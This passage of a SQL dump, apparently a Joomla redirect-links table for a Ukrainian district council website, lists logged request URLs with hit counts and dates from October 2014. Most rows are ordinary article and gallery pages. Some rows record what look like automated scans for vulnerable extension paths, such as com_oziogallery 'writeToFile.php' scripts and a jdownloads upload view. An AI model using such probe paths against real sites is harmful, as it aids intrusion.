00:00:00',301),(7207,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&lang=uk&Itemid=0','','','',5,0,'2014-10-06 18:48:10','0000-00-00 00:00:00',301),(7208,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=915:--------14--2012--340-l---------2012-2013-------------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',4,0,'2014-10-06 18:50:35','0000-00-00 00:00:00',301),(7209,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-06 19:07:25','0000-00-00 00:00:00',301),(7210,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-10-06 19:13:14','0000-00-00 00:00:00',301),(7211,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&lang=ru&Itemid=0','','','',5,0,'2014-10-06 19:16:11','0000-00-00 00:00:00',301),(7212,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-06 19:38:25','0000-00-00 00:00:00',301),(7213,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11&lang=en','','','',1,0,'2014-10-06 20:04:32','0000-00-00 00:00:00',301),(7214,'http://www.malyn-rayrada.org.ua/index.php?Itemid=1&id=3&lang=en&option=com_phocagallery&view=category','','','',3,0,'2014-10-06 20:14:05','0000-00-00 00:00:00',301),(7215,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&lang=en','','','',3,0,'2014-10-06 20:55:43','0000-00-00 00:00:00',301),(7216,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-06 21:01:44','0000-00-00 00:00:00',301),(7217,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1157:-11-2013-&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-06 21:17:28','0000-00-00 00:00:00',301),(7218,'http://www.malyn-rayrada.org.ua/index.php?id=2&Itemid=1&lang=uk&option=com_phocagallery&view=category','','','',2,0,'2014-10-06 21:22:43','0000-00-00 00:00:00',301),(7219,'http://malyn-rayrada.org.ua/verdure/components/com_community/index.html','','','',1,0,'2014-10-06 22:00:37','0000-00-00 00:00:00',301),(7220,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1031:2013-06-17-06-49-26&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-06 22:20:27','0000-00-00 00:00:00',301),(7221,'http://www.malyn-rayrada.org.ua/index.php?Itemid=32&lang=en&option=com_phocagallery&view=categories','','','',3,0,'2014-10-06 23:12:45','0000-00-00 00:00:00',301),(7222,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1007:-4-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-06 23:21:40','0000-00-00 00:00:00',301),(7223,'http://www.malyn-rayrada.org.ua/index.php?Itemid=1&id=4&lang=en&option=com_phocagallery&view=category','','','',1,0,'2014-10-06 23:30:53','0000-00-00 00:00:00',301),(7224,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=995:-2012-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-06 23:30:56','0000-00-00 00:00:00',301),(7225,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&catid=36&Itemid=70&lang=en','','','',4,0,'2014-10-06 23:54:45','0000-00-00 00:00:00',301),(7226,'http://www.malyn-rayrada.org.ua/rautalangasta/components/com_community/index.html','','','',1,0,'2014-10-07 00:04:53','0000-00-00 00:00:00',301),(7227,'http://www.malyn-rayrada.org.ua/rautalangasta/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-07 00:04:57','0000-00-00 00:00:00',301),(7228,'http://www.malyn-rayrada.org.ua/rautalangasta/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-07 00:05:00','0000-00-00 00:00:00',301),(7229,'http://www.malyn-rayrada.org.ua/rautalangasta/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-07 00:05:06','0000-00-00 00:00:00',301),(7230,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&catid=51:--19072013-&Itemid=92&lang=uk','','','',4,0,'2014-10-07 00:21:14','0000-00-00 00:00:00',301),(7231,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=32&lang=en','','','',5,0,'2014-10-07 00:22:14','0000-00-00 00:00:00',301),(7232,'http://www.malyn-rayrada.org.ua/tempsite/components/com_community/index.html','','','',1,0,'2014-10-07 00:25:46','0000-00-00 00:00:00',301),(7233,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1237:-200-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-07 02:41:45','0000-00-00 00:00:00',301),(7234,'http://www.malyn-rayrada.org.ua/index.php?Itemid=7&id=3&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2014-10-07 03:44:27','0000-00-00 00:00:00',301),(7235,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1356:2014-07-03-06-32-02&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-07 04:19:39','0000-00-00 00:00:00',301),(7236,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1250:2014-03-24-07-04-57&lang=en&option=com_content&view=article','','','',1,0,'2014-10-07 04:41:52','0000-00-00 00:00:00',301),(7237,'http://www.malyn-rayrada.org.ua/side/components/com_community/index.html','','','',4,0,'2014-10-07 04:50:17','0000-00-00 00:00:00',301),(7238,'http://www.malyn-rayrada.org.ua/webescolarrevellodetoro/components/com_community/index.html','','','',5,0,'2014-10-07 05:27:11','0000-00-00 00:00:00',301),(7239,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=994:2013-04-23-08-30-51&catid=50&Itemid=90&lang=ru','','','',2,0,'2014-10-07 05:51:30','0000-00-00 00:00:00',301),(7240,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=994:2013-04-23-08-30-51&catid=50:--23042013-&Itemid=90&lang=ru','','','',3,0,'2014-10-07 06:24:51','0000-00-00 00:00:00',301),(7241,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-10-07 07:42:28','0000-00-00 00:00:00',301),(7242,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1066:-23-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-07 07:48:54','0000-00-00 00:00:00',301),(7243,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1244:-2014-2018-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-07 08:10:26','0000-00-00 00:00:00',301),(7244,'http://malyn-rayrada.org.ua/default/components/com_community/index.html','','','',1,0,'2014-10-07 08:54:06','0000-00-00 00:00:00',301),(7245,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1238:2014-03-09-06-41-00&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-07 08:56:52','0000-00-00 00:00:00',301),(7246,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-10-07 09:07:55','0000-00-00 00:00:00',301),(7247,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1128:2013-11-06-13-04-56&lang=en&option=com_content&view=article','','','',1,0,'2014-10-07 09:46:34','0000-00-00 00:00:00',301),(7248,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1328:2014-06-01-11-58-56&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-07 10:30:11','0000-00-00 00:00:00',301),(7249,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1060:2013-07-27-10-13-15&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-07 12:07:11','0000-00-00 00:00:00',301),(7250,'http://www.malyn-rayrada.org.ua/index.php?Itemid=12&id=7&lang=en&layout=blog&option=com_content&view=category','','http://go.mail.ru/search?q=%D1%81%D0%BC%D1%82.%20%D0%93%D1%80%D0%B0%D0%BD%D1%96%D1%82%D0%BD%D0%B5&rch=l&sf=20','',3,0,'2014-10-07 12:41:37','0000-00-00 00:00:00',301),(7251,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1343:2014-06-14-17-26-47&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-07 12:49:05','0000-00-00 00:00:00',301),(7252,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1231:-q-q&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-07 13:04:48','0000-00-00 00:00:00',301),(7253,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-10-07 13:13:46','0000-00-00 00:00:00',301),(7254,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-10-07 13:32:05','0000-00-00 00:00:00',301),(7255,'http://malyn-rayrada.org.ua/joomla/components/com_community/index.html','','','',2,0,'2014-10-07 13:33:00','0000-00-00 00:00:00',301),(7256,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1312:2014-05-08-08-59-19&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-07 13:33:49','0000-00-00 00:00:00',301),(7257,'http://www.malyn-rayrada.org.ua/ceim/components/com_community/index.html','','','',2,0,'2014-10-07 13:35:07','0000-00-00 00:00:00',301),(7258,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&lang=en','','','',4,0,'2014-10-07 13:36:51','0000-00-00 00:00:00',301),(7259,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=924:2013-02-20-19-06-08&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-07 13:38:16','0000-00-00 00:00:00',301),(7260,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1292:-i-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-07 13:40:33','0000-00-00 00:00:00',301),(7261,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=978:-6612-&lang=en&option=com_content&view=article','','','',1,0,'2014-10-07 13:43:12','0000-00-00 00:00:00',301),(7262,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1315:-31-6-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-07 13:44:46','0000-00-00 00:00:00',301),(7263,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-10-07 13:58:45','0000-00-00 00:00:00',301),(7264,'http://www.malyn-rayrada.org.ua/jma/components/com_community/index.html','','','',1,0,'2014-10-07 14:03:51','0000-00-00 00:00:00',301),(7265,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11&lang=ru','','','',2,0,'2014-10-07 14:04:44','0000-00-00 00:00:00',301),(7266,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1113:2013-10-23-09-26-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',5,0,'2014-10-07 14:15:48','0000-00-00 00:00:00',301),(7267,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11&lang=ru','','','',2,0,'2014-10-07 14:20:43','0000-00-00 00:00:00',301),(7268,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=926:2013-02-21-09-02-30&catid=47:--21022013-&Itemid=86&lang=en','','','',2,0,'2014-10-07 17:31:07','0000-00-00 00:00:00',301),(7269,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=926:2013-02-21-09-02-30&catid=47:-21022013-&Itemid=86&lang=en','','','',2,0,'2014-10-07 17:36:27','0000-00-00 00:00:00',301),(7270,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1226:-1996-2004-&lang=en&option=com_content&view=article','','','',2,0,'2014-10-07 17:41:50','0000-00-00 00:00:00',301),(7271,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&lang=en&Itemid=0','','','',3,0,'2014-10-07 17:48:05','0000-00-00 00:00:00',301),(7272,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1094:2013-09-24-05-02-52&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-07 18:28:08','0000-00-00 00:00:00',301),(7273,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1213:2014-02-14-13-53-12&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-07 18:39:39','0000-00-00 00:00:00',301),(7274,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1314:2014-05-14-11-53-26&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-07 19:24:35','0000-00-00 00:00:00',301),(7275,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1316:2014-05-20-12-49-29&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-07 19:25:09','0000-00-00 00:00:00',301),(7276,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=990:-2013-&lang=ru&option=com_content&view=article','','','',6,0,'2014-10-07 19:37:04','0000-00-00 00:00:00',301),(7277,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1196:2014-01-30-14-12-50&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-07 19:38:44','0000-00-00 00:00:00',301),(7278,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1346:2014-06-18-11-51-53&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-07 19:40:02','0000-00-00 00:00:00',301),(7279,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1279:2014-04-13-11-36-46&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-07 19:40:27','0000-00-00 00:00:00',301),(7280,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1181:2014-01-22-06-06-13&lang=en&option=com_content&view=article','','','',3,0,'2014-10-07 19:40:32','0000-00-00 00:00:00',301),(7281,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1357:22-&lang=en&option=com_content&view=article','','','',1,0,'2014-10-07 19:40:44','0000-00-00 00:00:00',301),(7282,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=984:-20-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-07 19:41:14','0000-00-00 00:00:00',301),(7283,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1196:2014-01-30-14-12-50&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-07 19:41:19','0000-00-00 00:00:00',301),(7284,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1257:2014-03-29-18-03-31&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-07 19:41:38','0000-00-00 00:00:00',301),(7285,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1326:-100-547&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-07 19:41:43','0000-00-00 00:00:00',301),(7286,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=840:-2007-2015-&catid=46:--21122012&Itemid=85&lang=uk','','','',7,0,'2014-10-07 20:00:30','0000-00-00 00:00:00',301),(7287,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1352:2014-06-26-06-51-20&lang=en&option=com_content&view=article','','','',1,0,'2014-10-07 20:10:11','0000-00-00 00:00:00',301),(7288,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1231:-q-q&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-07 20:12:38','0000-00-00 00:00:00',301),(7289,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=990:-2013-&lang=en&option=com_content&view=article','','','',1,0,'2014-10-07 20:47:41','0000-00-00 00:00:00',301),(7290,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1091:2013-09-19-12-13-07&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-07 21:09:55','0000-00-00 00:00:00',301),(7291,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1102:2013-10-03-08-08-33&lang=ru&option=com_content&view=article','','','',6,0,'2014-10-07 21:42:47','0000-00-00 00:00:00',301),(7292,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=956:2013-03-07-14-51-33&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-07 21:57:22','0000-00-00 00:00:00',301),(7293,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1064:2013-08-09-07-52-21&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-07 22:26:13','0000-00-00 00:00:00',301),(7294,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1238:2014-03-09-06-41-00&lang=en&option=com_content&view=article','','','',1,0,'2014-10-07 22:26:43','0000-00-00 00:00:00',301),(7295,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1274:-l-r&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-07 22:40:25','0000-00-00 00:00:00',301),(7296,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1369:-lr-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-07 23:27:20','0000-00-00 00:00:00',301),(7297,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1219:-2004-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-08 00:05:36','0000-00-00 00:00:00',301),(7298,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1025:-2011-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-08 00:49:34','0000-00-00 00:00:00',301),(7299,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1042:-qq-&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-08 00:58:36','0000-00-00 00:00:00',301),(7300,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1176:-27-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-08 01:24:43','0000-00-00 00:00:00',301),(7301,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:------------2012-2015-&catid=36&Itemid=70&lang=en','','','',3,0,'2014-10-08 02:44:12','0000-00-00 00:00:00',301),(7302,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1239:--29----6-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-08 02:50:12','0000-00-00 00:00:00',301),(7303,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1181:2014-01-22-06-06-13&lang=ru&option=com_content&view=article','','','',5,0,'2014-10-08 02:52:45','0000-00-00 00:00:00',301),(7304,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1155:2013-12-07-15-56-12&lang=ru&option=com_content&view=article','','','',5,0,'2014-10-08 02:54:38','0000-00-00 00:00:00',301),(7305,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1339:2014-06-12-09-22-34&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',6,0,'2014-10-08 03:05:47','0000-00-00 00:00:00',301),(7306,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:------------2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2014-10-08 03:12:38','0000-00-00 00:00:00',301),(7307,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1209:-----2014-&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-08 03:22:16','0000-00-00 00:00:00',301),(7308,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:-lr&catid=36&Itemid=70&lang=en','','','',2,0,'2014-10-08 03:27:39','0000-00-00 00:00:00',301),(7309,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1080:-l-r&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-08 03:51:04','0000-00-00 00:00:00',301),(7310,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1107:c-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-08 04:02:17','0000-00-00 00:00:00',301),(7311,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=893:-2013-2014-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-08 04:02:18','0000-00-00 00:00:00',301),(7312,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1056:-22-&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-08 04:06:27','0000-00-00 00:00:00',301),(7313,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1339:2014-06-12-09-22-34&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2014-10-08 04:08:40','0000-00-00 00:00:00',301),(7314,'http://www.malyn-rayrada.org.ua/index.php?id=5&Itemid=6&lang=en&layout=blog&option=com_content&view=category','','','',3,0,'2014-10-08 04:21:46','0000-00-00 00:00:00',301),(7315,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54:--29112013-&id=1153:-2013-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-08 04:22:49','0000-00-00 00:00:00',301),(7316,'http://www.malyn-rayrada.org.ua/index.php?Itemid=32&id=2&lang=ru&option=com_phocagallery&view=category','','','',3,0,'2014-10-08 04:43:01','0000-00-00 00:00:00',301),(7317,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1011:2013-05-29-09-51-28&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-08 04:54:42','0000-00-00 00:00:00',301),(7318,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1079:-l-2011-2013-r&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-08 05:16:15','0000-00-00 00:00:00',301),(7319,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1139:---------14112013--84-l--25-----6-r&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-08 05:21:52','0000-00-00 00:00:00',301),(7320,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=47:-21022013-&Itemid=86&lang=uk','','','',4,0,'2014-10-08 05:36:54','0000-00-00 00:00:00',301),(7321,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1211:----2014--&catid=56:--03022014-&Itemid=97&lang=uk','','','',1,0,'2014-10-08 05:37:02','0000-00-00 00:00:00',301),(7322,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:--------2014--&catid=36&Itemid=70&lang=ru','','','',6,0,'2014-10-08 05:43:19','0000-00-00 00:00:00',301),(7323,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1099:-l-r&catid=53&Itemid=94&lang=uk','','','',2,0,'2014-10-08 05:49:22','0000-00-00 00:00:00',301),(7324,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/123-pro-hid-vikonannja-rajonnoi-programi-ozdorovlennja','',13,0,'2014-10-08 05:52:54','0000-00-00 00:00:00',301),(7325,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1025:------------2011-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-08 05:59:28','0000-00-00 00:00:00',301),(7326,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=924:2013-02-20-19-06-08&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-08 06:31:30','0000-00-00 00:00:00',301),(7327,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1184:----27----6-&lang=en&option=com_content&view=article','','','',1,0,'2014-10-08 06:38:11','0000-00-00 00:00:00',301),(7328,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:--------2014--&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-10-08 06:41:59','0000-00-00 00:00:00',301),(7329,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:--------2014--&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-10-08 06:59:31','0000-00-00 00:00:00',301),(7330,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1099:-l-r&catid=53:--25102013-&Itemid=94&lang=uk','','','',3,0,'2014-10-08 07:09:44','0000-00-00 00:00:00',301),(7331,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1368:2014-07-17-04-39-11&catid=11&Itemid=14&lang=en','','','',1,0,'2014-10-08 07:10:14','0000-00-00 00:00:00',301),(7332,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1368:2014-07-17-04-39-11&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-10-08 07:10:16','0000-00-00 00:00:00',301),(7333,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1368:2014-07-17-04-39-11&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-10-08 07:10:18','0000-00-00 00:00:00',301),(7334,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1368:2014-07-17-04-39-11&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-10-08 07:10:22','0000-00-00 00:00:00',301),(7335,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=47:--21022013-&Itemid=86&lang=ru','','','',4,0,'2014-10-08 07:22:45','0000-00-00 00:00:00',301),(7336,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1176:-27-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-08 07:28:57','0000-00-00 00:00:00',301),(7337,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&Itemid=14&lang=ru','','','',13,0,'2014-10-08 07:30:43','0000-00-00 00:00:00',301),(7338,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1222:2014-02-22-10-52-44&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-08 07:32:09','0000-00-00 00:00:00',301),(7339,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1099:-l-r&catid=53:--25102013-&Itemid=94&lang=ru','','','',1,0,'2014-10-08 07:50:30','0000-00-00 00:00:00',301),(7340,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=36&Itemid=70&lang=en','','','',3,0,'2014-10-08 07:52:45','0000-00-00 00:00:00',301),(7341,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&catid=56&Itemid=97&lang=en','','','',3,0,'2014-10-08 07:58:50','0000-00-00 00:00:00',301),(7342,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:--------2014--&catid=36&Itemid=70&lang=uk','','','',1,0,'2014-10-08 08:02:45','0000-00-00 00:00:00',301),(7343,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:--------2014--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2014-10-08 08:04:16','0000-00-00 00:00:00',301),(7344,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11&lang=ru&Itemid=','','','',3,0,'2014-10-08 08:05:06','0000-00-00 00:00:00',301),(7345,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=53:--25102013-&Itemid=94&lang=en','','','',2,0,'2014-10-08 08:07:51','0000-00-00 00:00:00',301),(7346,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-10-08 08:10:19','0000-00-00 00:00:00',301),(7347,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1090:-l-r-&catid=53&Itemid=94&lang=en','','','',1,0,'2014-10-08 08:10:24','0000-00-00 00:00:00',301),(7348,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:--------2014--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-10-08 08:32:11','0000-00-00 00:00:00',301),(7349,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1090:-l-r-&catid=53:--25102013-&Itemid=94&lang=en','','','',2,0,'2014-10-08 08:38:35','0000-00-00 00:00:00',301),(7350,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&catid=56:--03022014-&Itemid=97&lang=en','','','',3,0,'2014-10-08 08:54:36','0000-00-00 00:00:00',301),(7351,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-08 09:06:39','0000-00-00 00:00:00',301),(7352,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=954:-19-6-&lang=en&option=com_content&view=article','','','',2,0,'2014-10-08 